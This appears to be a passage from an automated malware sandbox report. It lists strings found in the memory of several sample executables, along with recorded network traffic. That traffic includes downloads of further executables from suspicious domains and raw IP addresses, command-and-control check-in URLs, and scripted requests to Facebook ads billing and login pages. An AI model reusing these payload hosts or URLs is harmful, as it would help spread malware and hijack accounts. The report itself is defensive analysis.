                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/P
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/Q
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/T
                  Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/V
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948SE
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948lE
                  Source: 2A57.exe, 00000008.00000002.617149584.0000000000562000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/safe
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/safeaaeg.comu
                  Source: 2A57.exe, 00000008.00000002.617149584.0000000000562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/safeeR
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/safewQ
                  Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/f
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com:80/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948bHU8
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com:80/check/safe
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://aaa.aptpokmmooootmtmymuok.com/w.facebohttps://wwcebfSTPOGET/device-based/logination/x-www-for
                  Source: EAA.exe, 0000000C.00000003.557836455.0000000002483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://avtlsgosecure.c24
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.636219136.000000000074B000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: explorer.exe, 0000000F.00000000.503967031.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.521532194.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://furubujjul.net/
                  Source: explorer.exe, 0000000F.00000000.503967031.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.521532194.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://furubujjul.net/Mozilla/5.0
                  Source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
                  Source: explorer.exe, 00000001.00000000.359830195.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.347268530.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.388576135.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317714700.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                  Source: ECFD.exe, 00000009.00000002.615541092.000000000071A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
                  Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
                  Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json)d
                  Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json5d
                  Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
                  Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messenger.com/
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yL/l/0
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/nHDYRDL5JAA.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/tuAGtaeF5Lw.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0
                  Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/w8iOGQ_Hw3c.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yr/l/0
                  Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yu/r/G76sQY80s37.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/GG1Y0sYc7My.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yy/l/0
                  Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz
                  Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.facebook.
                  Source: unknownDNS traffic detected: queries for: furubujjul.net
                  Source: global trafficHTTP traffic detected: GET /files/pe/pb1113.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kkh.eiwagggg.com
                  Source: global trafficHTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
                  Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /22.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.rukangiralawchambers.org
                  Source: global trafficHTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                  Source: global trafficHTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
                  Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
                  Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                  Source: global trafficHTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.138.74.52
                  Source: global trafficHTTP traffic detected: GET /intersock.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 179.43.163.115
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Thu, 13 Oct 2022 11:08:05 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hbAwJXDRzKYgO3xdYMEmowmTM2idYU9Liu8hsb0MCvcFgfhyvV2XhGRmTUzxe2HnCnNzA9WhmvmuzEKBFqL7PZJQ%2Fzuq7jWpwivO1cF4i2%2FareHc5B02a%2F%2FS1gbJpcjLZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c476a79775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 19 00 00 00 1f 3d 5a e6 71 20 3c 60 7e 45 e7 de bd d8 f7 26 6f 18 c8 43 85 0c 8a ae 57 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 73 d2 09 b6 c9 de db c5 ba 1e d7 7f 00 12 17 00 23 c9 75 21 7d 31 a2 02 6b a5 2d 41 ec 51 18 fa f8 e1 fc b7 d5 59 5e d9 fc 05 8a e6 2e b0 b3 25 e5 ea a7 6b bf aa d2 2a a1 30 2e 91 f4 d1 8f ea 9f c6 25 9c c5 89 09 cb 73 4a b2 26 d8 20 90 41 44 69 cf 7e 2f 45 4f d8 13 77 10 87 39 b4 bf 0f f7 e9 19 82 a7 10 b1 d7 19 1a 19 6a 33 fc 4e ec 20 86 9f cf 03 46 7d f0 e6 e5 4f a4 db 03 b4 3f dc 6e 62 a8 cf d0 14 a1 8b 5a 40 bb 9c 22 79 f8 02 92 87 b6 85 0e 2a 26 b7 a0 50 44 13 d1 ad da 68 6b 16 86 cc 76 b9 cc c2 8b e1 c5 1a 29 ca ae 93 ea 2a 85 ed cb d3 f5 00 0b 8c 84 9b 73 73 ac 0e 89 cf 08 3b 19 e1 d1 18 0b 83 49 65 d5 bc a8 fb f8 75 ea 73 e5 36 e7 89 9e bc fc e0 93 9f 0e 30 e3 b1 93 95 97 a7 51 6e c6 76 98 34 61 81 b9 d4 29 1e 0b 48 34 51 ea a8 27 bd a7 d3 19 7b ba fb 14 37 89 40 35 c9 72 ce ff 7e 73 02 80 1d 34 a3 d6 d5 35 54 16 c0 8c 0b b9 9c 39 cc 5a 58 e4 72 4a e6 3d ac 59 3b f2 1d 17 db 53 f1 f9 f8 6d 3c cd 87 c5 4c 80 7e b9 38 2b 2b 80 c9 45 28 26 8c 39 c1 e6 f7 06 d2 9f 3e 54 78 a5 8f 04 e0 44 d8 60 ef b0 31 16 26 48 3c be 6d 48 19 5f 48 77 e4 60 01 bd 87 b0 1c 9d a1 16 f4 36 d8 35 bf ff c2 92 ea 11 27 67 98 42 42 9d 33 db ad c4 a3 26 8a 4b 66 21 d8 e8 f5 cb c5 74 47 a9 b2 e7 8c 03 31 86 6a da 0d d8 d6 c4 39 45 06 a7 92 40 bc b7 0c ee a1 e3 2d e7 7f ff 08 9e 1a e4 a2 39 f6 af eb 37 f9 22 7e d2 9a 52 2e a6 c0 ce 7d 15 3c f7 86 de a3 9b c7 d1 a6 f5 37 e4 1d 47 e4 a8 f1 e3 34 b5 9d 6b e1 c6 0f 1e c2 d1 4c 69 46 31 be 52 37 2a 13 f1 90 bb 5e 00 af bd cf d3 34 dc cd 26 20 32 30 1e 71 18 15 45 d5 f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 